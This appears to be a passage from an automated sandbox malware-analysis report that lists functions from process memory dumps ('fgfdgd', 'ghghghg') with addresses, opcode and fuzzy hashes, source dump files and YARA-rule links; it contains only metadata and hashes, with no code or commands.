                                        • Opcode ID: ccbf5587c910f4c98c31c98250757e0ffc5ce0f6b9c6ee46c27f339e0002c8bd
                                        • Instruction ID: beef89eb05ac0cd6ebba8a3b1f9554c0920153f54f36ebc4099eb97302bda1db
                                        • Opcode Fuzzy Hash: ccbf5587c910f4c98c31c98250757e0ffc5ce0f6b9c6ee46c27f339e0002c8bd
                                        • Instruction Fuzzy Hash: 0101B6312488188FDF85FF18D0D8E6173E2FBB87417504599D50ACB6A6DE35EC84CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE1899286C Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a74d7b1be8a34b549bcd73087e91401081765922111e6bcc620c37ab9404259
                                        • Instruction ID: 572d38a915edf9cf9283e89a7717d3c274dfd06945ec465154ca692f702ebb37
                                        • Opcode Fuzzy Hash: 1a74d7b1be8a34b549bcd73087e91401081765922111e6bcc620c37ab9404259
                                        • Instruction Fuzzy Hash: E901F4316088188FDF49FF18C4A9D6577E1EF797417144199D40ACB6B6DE24ED44CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18992946 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb4ce4b5c3eaaf31f9b2fe9273ea55d3094608172520cea220ee93c8888b1b33
                                        • Instruction ID: b8f6453397b9ff054d976f4722e42bfd7968a0c7533ca93a7a07a94a18c6c8c4
                                        • Opcode Fuzzy Hash: eb4ce4b5c3eaaf31f9b2fe9273ea55d3094608172520cea220ee93c8888b1b33
                                        • Instruction Fuzzy Hash: 21F0A431248C088FDF85FB58D098E6173E2EBBD741B1145A9D10AC76B2DE25ED85CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18991966 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 047cedc07188cc41d89de2f181c11e4a91ffc82c1a6536ec52b25bbff951f505
                                        • Instruction ID: 0fb1710a61c147358dded3141141414143f8141e22f6c66fc51bf772bc076ef9
                                        • Opcode Fuzzy Hash: 047cedc07188cc41d89de2f181c11e4a91ffc82c1a6536ec52b25bbff951f505
                                        • Instruction Fuzzy Hash: 07F0AF3184E7C59FD7028B7098514E57FB4AF47325B1800EAD08AC70B2C56C5A5AC766
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18991629 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0c4ea3241ef09fa30ddf1ff65df189aefdfd346def9f126e23e05a7068f3ef9
                                        • Instruction ID: 66916fe852783dffe391c107a77168dcb80905b29d6834ffc770c44087b0f617
                                        • Opcode Fuzzy Hash: e0c4ea3241ef09fa30ddf1ff65df189aefdfd346def9f126e23e05a7068f3ef9
                                        • Instruction Fuzzy Hash: 0BF0FF70D0895DCFDF94DB88C494AA8B7B1FB68301F1445ADC00EE72A1CA35A980CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189910FD Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed382c0b0aedaf96228ff64161130d955e05423c3be473c884f87ed2c7ed96f5
                                        • Instruction ID: bd75e027ccb09072609ed054f1ba1fbd25644d3a4c76ddb9496d5d78db410f33
                                        • Opcode Fuzzy Hash: ed382c0b0aedaf96228ff64161130d955e05423c3be473c884f87ed2c7ed96f5
                                        • Instruction Fuzzy Hash: 1BE02B3140CA444FCF54EB29D4D4D917BA0EF3830070604CEC005C71B7D965DC94C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18991917 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1f0d8ad2ca9fa475d2da41ed08683943ce1f029081aad28d7270e5761376335
                                        • Instruction ID: 85bcfea0024b1846e558b6426ad30249f6d4bd5562ae1672c56630bdb313ba0c
                                        • Opcode Fuzzy Hash: e1f0d8ad2ca9fa475d2da41ed08683943ce1f029081aad28d7270e5761376335
                                        • Instruction Fuzzy Hash: FFF0A530A5481C8FCF94EA18D894BA8B3B1EBA9341F1045D9D00EE3261CA759DC1CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189910DD Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28bd8889bad4050eb03edc3497500a4a4a22513384cfca298220b5190c89ee6e
                                        • Instruction ID: ee7fd9ae7a13de696f1c0a9288483fdde2037c70edd83faa202a724c9091f11f
                                        • Opcode Fuzzy Hash: 28bd8889bad4050eb03edc3497500a4a4a22513384cfca298220b5190c89ee6e
                                        • Instruction Fuzzy Hash: 93E0E646E5CCAB46B7A4515A20151BC12C1BB5C772B9501F9D41FC72F1DC4F1E819689
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189919D8 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a7a3395d6f1bc57b75c8e37d80fbb3170a5308f90138fb93025fd5ec432d09c
                                        • Instruction ID: bea47c218fd46c81dc7a7462f9dcdab1ea078f16692996a8d663af299a2819dd
                                        • Opcode Fuzzy Hash: 4a7a3395d6f1bc57b75c8e37d80fbb3170a5308f90138fb93025fd5ec432d09c
                                        • Instruction Fuzzy Hash: E0E0EDB5D1DE898BEB029724A8100EC7BA0FF48315F1400FED10E831B2DA2D5728E38A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189937D9 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ebd79dc55d6c314e69e7ea471e6612f7937a31e842ec33fb41df8a28be2517b
                                        • Instruction ID: 32f8330c236fcf6d4b0da3a33a17e695c04d863c13fe4afb3d560e2462ff8c2e
                                        • Opcode Fuzzy Hash: 9ebd79dc55d6c314e69e7ea471e6612f7937a31e842ec33fb41df8a28be2517b
                                        • Instruction Fuzzy Hash: A3E0C232B1C8148FE744F728E859AF0B3C1EF6433171405EAD40AC70B2ED2AD881C786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189927FF Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 426396ce22186c4ad37b500f78ad59cd10140de82f23348661842a1852a53686
                                        • Instruction ID: 3d8cb6c0c8a859b8441aebe86a6bb3eed48337d350958bd338a0ff0c5faee438
                                        • Opcode Fuzzy Hash: 426396ce22186c4ad37b500f78ad59cd10140de82f23348661842a1852a53686
                                        • Instruction Fuzzy Hash: B8E0EC31758C084FAB84EA2C805DE6833D2EBAC75275501A5E00EC72B2DD24DD818741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18992DAB Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1b8ad1e5504443bc580e48f4f6272715c430856667fda21c9a8e5c211784a68
                                        • Instruction ID: edd5dd38d2b0e9eb4139c50d5c233a857824427428402fe537c976f927005f1b
                                        • Opcode Fuzzy Hash: e1b8ad1e5504443bc580e48f4f6272715c430856667fda21c9a8e5c211784a68
                                        • Instruction Fuzzy Hash: 6BD09E31714C0C4FDF85FB18D454E5573D1EBB87017504469900DC72A5DE24DD85CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18992D8A Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9baeb9b9a92bffc7554f216544d16626a7e13a99f1df08c081d96657f95aedc3
                                        • Instruction ID: b032f6eb29a5bd3002686bb378e94aadc9b7195dc89b1351c2ea6b4390120a88
                                        • Opcode Fuzzy Hash: 9baeb9b9a92bffc7554f216544d16626a7e13a99f1df08c081d96657f95aedc3
                                        • Instruction Fuzzy Hash: D9C04C01729E0D1E5194A59C385537927C2D79D4517C4167B941EC335AEC545C470282
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189910C3 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction ID: 33f67d08057266b0c37420ec56bc5ccd9448cb22076e5c2910c09d3455a49b05
                                        • Opcode Fuzzy Hash: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction Fuzzy Hash: 0CC08051ECDD1749FB94509660020FC7250BF0D331B4820FDC01F812B2DC4F19818645
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FF65E491140 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000003D.00000002.4178367256.00007FF65E491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF65E490000, based on PE: true
                                        • Associated: 0000003D.00000002.4178075968.00007FF65E490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000003D.00000002.4179001180.00007FF65E497000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000003D.00000002.4179310513.00007FF65E499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000003D.00000002.4179826039.00007FF65E49A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000003D.00000002.4182135576.00007FF65E707000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000003D.00000002.4182341391.00007FF65E70D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000003D.00000002.4183235769.00007FF65E983000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000003D.00000002.4183290670.00007FF65E985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_61_2_7ff65e490000_ghghghg.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction ID: e4cca2c2fce67dfd066e7156d6a59f799101edf4b6e05dd51bc256ff772e8f42
                                        • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction Fuzzy Hash: C9B01232D0430F84EB002F01DB4235932606B2C780F450030E50CF3362CF7D68504B10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFE188F1F4A Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p]$u
                                        • API String ID: 0-4288194166
                                        • Opcode ID: 09a267ae10668e0f625e39f16f971e8915bee1aff7adc47ddc7fff3607bf6513
                                        • Instruction ID: 1ef056b42600baea9712022fb60a7b33cedf4523c84921d041a9e8591acf3ee0
                                        • Opcode Fuzzy Hash: 09a267ae10668e0f625e39f16f971e8915bee1aff7adc47ddc7fff3607bf6513
                                        • Instruction Fuzzy Hash: CCE1F43590CD598BE769DA19C8469F477E0EF46330F8401F9E05EC35B2EF286E068A98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F19D4 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#$u
                                        • API String ID: 0-988003089
                                        • Opcode ID: 5acb635d261692fc103af4335f8274726bc079aa7262bc6282a7b2d0313ddc4a
                                        • Instruction ID: 24b609170961717c17d18aab34e0df60593f77a98bd3353cfd56137d4d5d65bc
                                        • Opcode Fuzzy Hash: 5acb635d261692fc103af4335f8274726bc079aa7262bc6282a7b2d0313ddc4a
                                        • Instruction Fuzzy Hash: C4B1D035A1CE4D8FEB59EA28C845AF973E5FF96321F5001BAD04EC31A2DE35AD428744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F08AA Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: h_H
                                        • API String ID: 0-1605141047
                                        • Opcode ID: f67b58e2b6d40949cb591c4f5584176aed0f3389d7d0aa508817f8f7d2c80f1b
                                        • Instruction ID: 06e08588ac83e2cf6dea9c3756fd636d58b919377b75c5a28f2b664bc8adaf6d
                                        • Opcode Fuzzy Hash: f67b58e2b6d40949cb591c4f5584176aed0f3389d7d0aa508817f8f7d2c80f1b
                                        • Instruction Fuzzy Hash: E7F01271D2890F9EDF648B45D8415FD77F1FF48310F9001B9C11AE2191DB282E02C795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F0B25 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17f45493549191da9827fbf56f3d2f3f4a174141159b3d20824cefcb490a037c
                                        • Instruction ID: 7e7e9e1608fc180e326a1dd2e01f1534273a0686993a2f1ac0b1413bd9cbfe68
                                        • Opcode Fuzzy Hash: 17f45493549191da9827fbf56f3d2f3f4a174141159b3d20824cefcb490a037c
                                        • Instruction Fuzzy Hash: 9C41B635A0CE098FDB58DA19C8466E877D1FF44326F9002F9D45DC7572DB28AD178B84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2F3F Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6019375559ae934b74744ea855a43e8a813849bec75061f138892a958e6fc62f
                                        • Instruction ID: 3c38578b0d4a63d6dee2d74a4ac32a2cef08305fd7fc5a0103f4f2d8832bb425
                                        • Opcode Fuzzy Hash: 6019375559ae934b74744ea855a43e8a813849bec75061f138892a958e6fc62f
                                        • Instruction Fuzzy Hash: A5414A3061CA4A4FC705EB29C440DF5BBF2EFD6311F1886FAE489C716BDA29E9858741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2A8D Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ced65749d38f992aaf0344d8cc1d8465354eab28cd2bb96127f07377837a475
                                        • Instruction ID: fb4d78a80e953a28c183df7e207ad86ce593991a9276675c677e6742a17d7366
                                        • Opcode Fuzzy Hash: 0ced65749d38f992aaf0344d8cc1d8465354eab28cd2bb96127f07377837a475
                                        • Instruction Fuzzy Hash: 9931FD30248D4C8FDF89FB68C498E6537E1EFA930171441A9D44ACB6B6DE24ED85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2AAC Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb500315ce7d4ec205a7e873316e64489ef4252a05614d415720f8ffd8e78fc9
                                        • Instruction ID: 8bed7a8935f3176f52ac140a050480151bc37054bee4b983c12d4ab54e85e732
                                        • Opcode Fuzzy Hash: eb500315ce7d4ec205a7e873316e64489ef4252a05614d415720f8ffd8e78fc9
                                        • Instruction Fuzzy Hash: 4221AA30348D0C8FDF89FF58C498EA537E2EBA930571041A9D50ACB6B6DE24ED85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F0BDC Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d1fd7a7f47d15cbd8fb7c87c27821d432a4939a88858f6b9b9c4b63bdaa4fbd
                                        • Instruction ID: ab3f65dc8ebae9e719f8de89767571ad844e229f9deb6cedf79cae6eee231add
                                        • Opcode Fuzzy Hash: 5d1fd7a7f47d15cbd8fb7c87c27821d432a4939a88858f6b9b9c4b63bdaa4fbd
                                        • Instruction Fuzzy Hash: 5321A171A0CD488FDBA8EA1CD4466F8B7D1EF99321F4002FAD04DC7972DE68AD064785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F204A Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e4363f4e4af1a0cdf6954510df757010c87774fa3313464985c52f4b56ccebf
                                        • Instruction ID: 7fd967349dd56cd9779e945ab1be031d7d9df1c6323e0a2c697f22de964ec0eb
                                        • Opcode Fuzzy Hash: 4e4363f4e4af1a0cdf6954510df757010c87774fa3313464985c52f4b56ccebf
                                        • Instruction Fuzzy Hash: E6111E71A18A188FDB58DF5CD845AADB7E1FF59321F1042AFE04ED3662DB31AC428B44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F0C25 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c8722e5f167ab8926b9965983ce89bd535c4181132d756dfe3b67cf7dfda28d
                                        • Instruction ID: 6506e9aa6f22830df8e2b92f8da14cdf4c395739c08f71ccb9c45ccc9291e0c3
                                        • Opcode Fuzzy Hash: 0c8722e5f167ab8926b9965983ce89bd535c4181132d756dfe3b67cf7dfda28d
                                        • Instruction Fuzzy Hash: 13019271B1D9488FD798DA1CD4166B977D1EF88321B4002BFE08EC3972DE25AD064745
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F28D1 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8900d4cd8aec22a96700a1589f18da63d3fbb978d035aea7701669f5e06651ff
                                        • Instruction ID: 288d02f9c925036574df1defdeda3f938a7442c095d8cf2b3963a91a78d4b12f
                                        • Opcode Fuzzy Hash: 8900d4cd8aec22a96700a1589f18da63d3fbb978d035aea7701669f5e06651ff
                                        • Instruction Fuzzy Hash: B901923120881CCFDB89FF18C098E61B3A2EB783057544159D44ACB665DF35EC94CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2845 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18a5e16f77f2c61a5436dea1c4bcf8110ddc7d0ddbe2aa03db86acf2079a8e48
                                        • Instruction ID: 4d8c80bdee7a2b0e4055371fec459335e5551264aa7f3559fae8e0c2e5ed1ed3
                                        • Opcode Fuzzy Hash: 18a5e16f77f2c61a5436dea1c4bcf8110ddc7d0ddbe2aa03db86acf2079a8e48
                                        • Instruction Fuzzy Hash: A2F06230209D498FCF99EF28D499DA63BE1EFA9301304019DE40ACB2A6DF24ED44CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2871 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1826d483f6c1ee2ffa2f2f069bb1e119e574b9735ac31e6409eeff4d025de5d
                                        • Instruction ID: 3cff83b34274bbfdcde6ab9461e33580b350808be0eb90f0c444826a14154b6c
                                        • Opcode Fuzzy Hash: b1826d483f6c1ee2ffa2f2f069bb1e119e574b9735ac31e6409eeff4d025de5d
                                        • Instruction Fuzzy Hash: 7DF0BD312088188FDF89FF28C499EA577E1EF793457144199E40ACB6B5DE34ED84CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2946 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d9f1a36752723912ee531c17765ed289da65697566c02a41ca32457b62fbf5e
                                        • Instruction ID: b2b0a72a006363f900daca7f9f3b8ea953782cf9108158415ab3a34e14b9f8dc
                                        • Opcode Fuzzy Hash: 1d9f1a36752723912ee531c17765ed289da65697566c02a41ca32457b62fbf5e
                                        • Instruction Fuzzy Hash: 30F09231208C488FDB89FA18C098E6173A2EB79306B144169D10AC76B5DE24ED95CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F1966 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e018a24ce75056e61c525e414ef075b560f0d64e2393c3364468917f834b17d9
